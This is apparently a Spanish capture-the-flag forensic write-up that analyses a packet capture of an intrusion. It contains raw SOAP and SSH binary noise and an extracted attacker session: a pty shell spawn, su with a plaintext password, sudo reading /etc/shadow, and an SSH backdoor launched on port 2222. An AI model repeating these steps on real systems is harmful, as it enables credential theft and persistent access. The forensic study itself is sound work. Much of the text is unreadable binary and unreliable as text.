xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
|        .. .     |
|       .  +      |
|      o   .=.    |
|     . o  o+.    |
|      + S +.     |
|     =.o %.      |
|    ..*.% =.     |
|    .+.X+*.+     |
|   .oo=++=Eo.    |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
����$����▒9��N�qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1ssh-rsaUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrBhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96nonenoneb*2�Y���cZHD��
������� ��O�72
�curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c�rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1▒none,zlib@openssh.com,zlib▒none,zlib@openssh.com,zlib, uoɐ�Хo�r
�)o���}
       �A����
             ���ssh-rsa��nQK��=��s�0��J�w(-z���IB&�d�=��(�����;k�7���DmzՏ��)�   �^%B|��&���"�_�#PY�0�
                                                                                                     �x����������O-�>�#U��Q��hy
m��z��8�^f& ��\a:���\e�����SɤB"W�P�;�N����D���/Ґ׵��>Y��hhT���"5���c|#P��Q�&?�ܪ����5@�<h�h� q&{�T����� ����K�������,ѓ0�ssh-rsaIFw1��&�e~��AY�j�?NK2���'-G�3���>#D٨�ci_�&��0_6��XK��gE�Ȍ$��*��ű�߃��v!��v������}h8�8߾
                                                                                 4�߼p�FB�a_���9���JTrf��v���7�/�@Y!!��epo�lޘ���11���P)����-Ǩ�z����-5Ғ���'���Pa)��bic��"ϔ&1���F�j�.��\.r�$�Tg�    8��H
4�����Cb���_��$R�h

��A��N��SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
�_1�y@x�~W��
            �kqcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1ssh-rsaUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrUaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctrBhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96nonenone�@'�e����
b��c��@ �G����a��curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c�ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsalchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1▒none,zlib@openssh.com,zlib▒none,zlib@openssh.com,zlib, �|�!}�U����+��h.��U��&@FNo�تsssh-rsa��nQK��=��s�0��J�w(-z���IB&�d�=��(�����;k�7���DmzՏ��)�     �^%B|��&���"�_�#PY�0�
                             �x����������O-�>�#U��Q��hy
m��z��8�^f& ��\a:���\e�����SɤB"W�P�;�N����D���/Ґ׵��>Y��hhT���"5���c|#P��Q�&?�ܪ����5@�<h�h� ��u��;�n▒'
                                                                                                     CH��oR����P�G+Bssh-rsa���0m�G���m��J�,��a|���       7b▒�fGk�aU�O0VN�m!_c���A淢w�IJ;��M��ʴ
                                                             d��/�a�:mb�~�Hp+��r�6�Ft��(:G���-��������9��[Z�'��нк�ywI`���#x��t�W�
�����. �J�2�/���O��▒�Y^3�����������kr;�j����X�����
                                                  �N`
1<���"�u巋�xՍ�V�p�*U��H�E�U�▒�����v

�cF����|

��6��e�q
gG�2r�@_����!TKe�R4����y�5�P��2�۵Z{�h�x(��CzJ<#B��Y�kG9-�b�▒90l�k�0��N����woX�;/ޛ���wS����r��4dڌ�=��Re��}L �LP.�lq����c�_���4�1����Ȭ&��h��@(�|��8�a�Hm�t��=�w�ʇG������&q����(���%5kT�W�N"p��#���243��v�,P@�%=['����`8�厸���"�o�)|��s]��5���xE��!S.F��W���e2��`U��(s����<��2���B�3�_hx�r�O3V�z�����oщ��]S-vl���X�&�
e��Zi�6)��K�.[�
               :r6<|�W��A�3�)Iג���Z^S�!Kg%��Ƙ�`4C+�������g
                                                          �c��5���4{�Eھ
�{cD�?��X$/2u������+v�! ,޷�$~T\����`<<�c�Y�~��ma5�|�Pv=�'۔�            e��q��N�إ�A?�(/���E���@��G�ˆ垉^��Z���.
��▒,�܃t؝A�����S����l������i�i��▒j4j▒x�[7^ȴm��o9��r@�aҠ�H\;��5r�SK�^$A�
N�z�
    �4��i�o��AB�E�����  q0;��k��,4��I���a�\�f��?��hX����4�/LU�u����2ȕ�Af�P6���u ,��6N��U���u_y��W
x9~P��~��                                                                                        ���.���E��s�
L^߆�|��xq��HZ!I�QX}$��p▒��������(�\L3�{�0K"������T-¿��؍��_�1��,�ח!3,���O�6g
T�,ȴBLWQ@�K�"N��bC�2�u���O*��:����f�<�%���e���^hq_��i��L������  ��7���r���'���}#�z��:K����<<lE�t�N�'�G�9^�1ٹ`�pN��f� <Xz�+�W����1z��{�m�b��3)qtU�*q������U!�|�e�j4�t��J���RM��F�.5�+��
                                                     ���!��yHQ[�%܉�P!����5��w
                                                                             �%Ȋ��S�]W�F6H����岍��}���▒+�Ѻv��O��y�dq)�5�f�Ҙ
                                                                                                                           H|GfC.��u     `���b&.��
                 E؎kO��cHSy�/�H�l��SE��i��
                                          fiB��oJ�De&�g1+�g|���
                                                               �sky�6�Y��Q��G0II�b������D▒>��pe��� A�}��WOݣ{Ej�ao��d����{�������n�K�>.JޱE�<��~�0�i�h���/5���KmW��,��MI�����IJ�ƆH:��:�Fj�V�z�z��y��Y=_D�D�J�H%��Ԡ��&��GK�G܄���K
       ~����B����y�T๽>^/!%�j���~�       � �R!�p��N��=zq�r��F6sE���q���(Mq�Tt}�fu���.t,�LZ8����mL�VH8�*��dCb�t���
��ɤ`T���A���nM�h�������`=���٠�����������uKQ�ʌ��w�1p�BG�Q�i#㦒�E�
                                                                �D1`�᜼䅼��I�
                                                                            >UJ��
z�]�F����fd�����uD$<H.���*!h�2)�s%<w���NQ���
�m���ҏ�a2�ee������ﴸफ़��dZ��.�4N�GW6��C)_�"+b��NM`E�rcY�}}�v�%*�#E▒ӷ�{7o��땜$t��N���]�tLX_՝c��▒�▒Jԥ���)��J�3i�m��](����*�*m���v����JÜ\yj�a6W1�|UM▒�����$�K�|?e�(蠓EB;g}�5/�M��gQĜJ���'�s����Rm6tQ�y��\
��7�|��`$                                                          1�"^���
         8�W�~�^�q�^t�Ո�"8��404N�nQF��"}�▒��l,   ���>P�_oOTm�1~A� 
                                                                   +��<�ȲMDL\h]"
                                                                                4IGW
                                                                                    #�ӛ���'}�/���`��-��J�_�C���eF������^�2g��B�a�6�G/�h3*�rDܤ4�"5
                ��9�Zp�������GO.uT�c���Cq���5�;5[
                                                 ~��O�?�����]z!��R�!�_�`3��S$v�6�%�g_�1���l>�DzWA�!J��Cf����1�mW<G8}N�b u���������k�0Ǖ�ۺ�W����fǂ�:x��Na?�w���H��w
�8�$�R��'\���ϗdjH�lnc2?�d�0�J���>�|��E\F?Vjm�/��_�l5�(���f���1d���;�=��
                                                           �C
                                                             I�FshG��)Ld u▒�]fW�c8��|,GC�`9����jފ�K���!j),      Tޖr{�U�9�=d�'���2�Vb�L8��=;7g�B�ٻ�}��u�J!奩D��sC�X��x��a�v~
                                          h{��)��T�1۾������6N8����*��%����V�3&u&�<($����l�u��e���~�]v�t��y��    9�5����{�'�V�ڡ��&��e�J⑤r��l�H.�%��QyI\��S�9��(�綥�
                                  ���z��OζO���;MJϩ3��t��'▒nW�
���+����p���▒ƾ���=E\��:�
                        25s�-�`��A5��Yc�Y]Բ�Dj�\A���`�F/����'ic�v����3r�nc�sWoTӋݡ'8�sc�����Q{d��Md~��[kDT=�p�/�08�f���x�/a��ю���Ri٭�~ ���3�3�����
hPjm��          *�_��qn���cٶui�Ћ)ɷZ;-�c�w� ��N�5 Ѽ D�|mKܩ�]Ǖn▒�ӿ�a����U>��)�W
��Mj�p���/kt�I��z�����*���i
                           �    �޼\���m��H�īG�9�48�cZeQ��|k�    �,�lE�'1۔K�
                                                                           %�(}�w��&��Lv�"�▒�}�<�,�R�����'�▒抖���*��0�מK�o�G��'^��W���œ���NP�����v�'�}����)li��C�k▒��9��k[K6H▒��o�ڋ�t���yx���Mo@�c�v���o��p��-ض�}�h�y��UKK��9}T˺�#�iݴ
��Y 08e�kAඉ^I/�]�zJ�V�H�'�%)2Ma�����(�FU��V�Xg{���'<�p�����)e�z�▒%��ϻO
��'�����e�F@��0��
                 �
a�▒��L�:E������   �
               .#j��a��N����T�<:rdzK��6U�\������yN�_{��k���6GN���2���%@�ػ������u����DGr�y��&bKr?ؼ��x�_'�&%?��54/��:�󂝬H�z$�?7��}�;�ս�U�_�������<���G]|�
��;�cR�/A�n)f�"�3�cn�]i���B��G#+Z9���;}�`[��VC
5�������#�+�b����)��<�G $���a3˰�t^N��{����h@��J1<i�d�޷Z��
                                                         \^▒�z��v�1���`��%����;v��]��O���eUU��q▒�C��v���g��uS���J�"1��j"�J�������7�H`�n���3�qqLF�l;��}�W��_��w��zD쀧357t��N|aN�p��g0�����M��Ys�`�d�j@Or�(t�Un���J�����U$Š�z�;��� 
�n𺡳�#��"H�&w���O�־7�ݜQ�C|��{�e`@>��[�n��WC�!hB�1^>�y �IO� �M��  ���]ahD�r��p
lKL��4���PCPK!�DZ�l%���s���`�~t�f}�s^&u���������q�~����▒�!��c��Fj���(ΚGe�!
                                      �\ԶB(�C�LҠ7
pp���V���h�܍���'0�����&Sy���,����׎�aakLM���\B�=u0�Qt���Eg�����O|��ȏ�R�*��6��x�-k
@T!�q���1�[����T�7H>Q����i��x�%8 V�<�0�/PP��[�C�� ���rB�[�?,�Wl�)�
Os!X�S��[��@v������:�j@6q�X�Pu�Q_,MI���N�&(�!bKA"�T'P�>��
Yj���f=�A-T�G�|�AP��&��j�|ɻT�p�A��S
                                 ��R���z2 {�2��7@#���5�u% w@V���J��>O�y�s�@Q��  ������lgi���9b�b��%w�}���x�▒    ��v|4�i▒F�I��8��
                                                                                                                                �� 8�d�<�l��ˇb)��B�i�e?'���3H��F�����5
                                     ▒�����ɵZ�����X��l▒�7

                                                         �t��{�7�:�f�d�
                                                                       �n�๚ܤ��Q�'�<���n����Wl�%���J�r�N~�{�s��TT�ypo�˟Ӛ���^�W�����Rh��y��@�z\j���[��u(�Qg�8�f�h��Q_▒7���9��1��?��3bdz���▒���2eҵ��o����Q�h�k���e��i~#:�
                                                                                    �p����jD�|j;�Q��▒i�>�:4W>�_���@v�u��;a�o���ı�k��p���a�
         �{"O��O�����:`�t����bjs���E�<P`�ݴK\�,���(�� �
                                                      ��1��Rw5�▒D6����{��b▒ޣ����ግ���2&���`��h��c15$�ƛ���
                                                                                                        �jH��ߊ��P��(n>�4�w�e�&ϴCqQ��
   �5���b���*��؇��S�W\\��W�o/<x\8K ��f8�����_|z>��� O��vy43���q�U�A`q���j�:�ÃYb�Au���VcŚ}����o��]6�ʁW��I)���3��9,/�E�j�e��rkњ�w�ڹ�(�}7$��8��l���f���@����s����Gz�
                                �
�}H�[�U�=���H٦�
2|��rx�����L��$��y,�2�x�L���[�sP+��0 �,�zhR#\9r�#����~O�6��[�f{��}S�[�q:r��,)D�K��S�N�J���"���▒�����N�.�G���Ɋ��
                 �
                  l;!�\��%��}H�%�V���Rh����0S��=ߟFo�n�&�Z��QE^(6���:0�Mxn�^�Ǒ�xcα�4
[
 "����,6�|J�4�?�$��▒�w���5��F)%r�v�TӬ���&�#c��h�e)nB��O�l�e�>c;�L1O�,�X��hT�;��}��/ѣ?��1���L����ňo{
                                                                                                   ���J�5�e�GvL��k��~�G��37��ܨ�42���j����w@���שH��Z�9,Ճ4���Mu�A
    V���t��G�I.�I��t�a<x����1c�r���x�w����g▒b2��p���Z�I�m�T-�c����|�`�+k��      �nǼ�Q4E����
4�,����FEYc����~d���
U�l�f/I��E�-`��w���#L��ERrO�9�$5���▒"!�����x�s�#U&\��
   �i�����e
           y��2�e �G���Y�����z�!-U�s9��`▒7'�49>g�X&���"%��#�<{�[_�N��79[�@��蛄�v"8�*�V� EZ3Й���wfir��>�kB���OD%��N��74O
                                                                                                                       sv~7��y`#S)h4���
x�4���G
�����1C3▒���'���F����+�K����LN7��m�_��"�M�a▒�k�*��J�D1���r�I�Lt6��L2I�k|���g[]����n�j"Q*�9�bc��`�ۆ�����J\����|1h�"�_�G�|��v=�����f����D���
         ��|H�a�%eE���C�▒@��;�����)'���(`pe0�T�3���m���.]f5C�znLj�T;&�����3�E���@\U���Q|j�|�9�r�/���6�֋)�3�
                                                                                                          b�y����� (��P�xI�Kݛ ���Χ��ņJ_������~   �:���BÕ����~��T؞DSC��ˡO�ă��>�9c▒�WӸ��B�!��[�▒&9�
                                                                ����;▒�һ�cn�q�~+��./�=�;JRy��.RFڎpEP�+�nS���]V���b�P�+
�Ε�彎�h�FC�▒��Ʈ�����i�}��H��>��4�਱���])��|c���h+{�`�z�>��e�+���zC�5����Y�6����W'!▒KW�}���]��G[�                       >�▒����
��`��wNHvyY�)P▒I�[�V���6�㗴U�^��?Vd�rj�w�{��kR�[�II��/l�W�^C���O2/;x(�Ӿ
                                                                       ���l�&$;��Z?��85%[�v��cJ��~U�TlF�▒��▒
                                                                                                            �s��/b��K��y�▒╜��1��'q��
~�����62��W���N�C��ud��;{t��"��g1�{�f��s�j�mۋ����"XT
                                           r��2$�u���p�I)��/V�渒�I~�(�EaB��&3v��o�}&"z���
                                                                                         mK.��^s����ǻ%v��▒���}���T�J�jF�5��O�g���[3��-s�����Ұ`�/���[3�5�*
                        )
�5�dCT>�43�e��H�G���\V�w�$J���%ÎY��~�DhP�����J!1�~p����TY/'5�1�r6�T���=l����Ѱ�
                                B��s9���as��� ��▒�<������▒����l���i������$8�te}�Fvc�dl�P�(�{��l������s�3�▒�U?˯����ϯ&mGW�������@����/k>�4���ԛH��݌��[�2j+/q�\�%V2i諎1�v.�z~��~������{T;4▒x
\���N:��?u��-   �\*���U�@7X�L_�|��b����p�'��\Fbͺ�t�gsMD�
                                                        �r44�;��;�L-��zm���Ŵh]����a���b��g|ý��hb:���w���*����M#i/_���?$h�i�4gBt�TI�jv�z����N&G���=`�����▒���0�9▒1���c=yK�Y��ZW�d}|��������Ƿh}��=�Ѧ�׷���{b�#�z�°�����I���R����޵�f�t�(��-\�;T����8▒�P1�
                                                                                                                    c(�ՃP۸+vg�B��ܗ����W}}%63�q�y1z-��qh��`G-���T�Ⱦ���▒Y���@ib��z-���O�$V�d+�Nڢߔ�-��5^�i���i�8
U���"���Dh�,��Y3k�5��O��l>�(�Zl�&����3����V�?L�(�}����,B�;���*Ze�^▒������|hߩ�G�LJ%m9���{(��D(F▒F���N��,  �
                                  ����˓(0�t>iC��˝�2�Lwj������)d�b�����#��#
��Gas3T9�>�^�!l��x R�8��]S �tu`܉F�o�LC����h,=d�C�Y�]����Ŋm�aH�ٷ�g�����0���1�?�ox�?� �S���xM���*
                                                                                               ▒pM=e2��9Ӻl��4�3}�ݥ�
���h3ҙ�7��
          �     ��ڼԯ��c�lI��/�W��(q^�%��@����e�������a���Q�d��*�s�������-C��!��Y���ʻ08�c����5l��Š����K���n�O�]��Ԛh����Y��v� ��)=&!��Π���z���(wH�3j�J�zڝ�$�B����}�Ђ���Z�M\���!�jI��>n�uv  �۾j'�������^�B}?�I��=���@M�4]�.ϙ��>2����X�j��I���ȃ��R�|�h�I�.n��.����%��.b$1���>�䋎y��E�71S��5#c�`��]    }��?]��Lw��?W[��Х%U�ʺ.+k 






USNDO CASI EL MISMO COMANDO CON FILTRO y USANDO STRINGS PARA QUE NOS LOS STRINGS EN TEXTO PLANO LEGIBLES LO VEMOS MAS EN LIMPIO y VEMOS LA CONTRASEÑA QUE USO EN EL COMANDO EL ATACANTE PARA PRIVESC: (whenevernoteartinstant) :






┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
            prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
    (ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
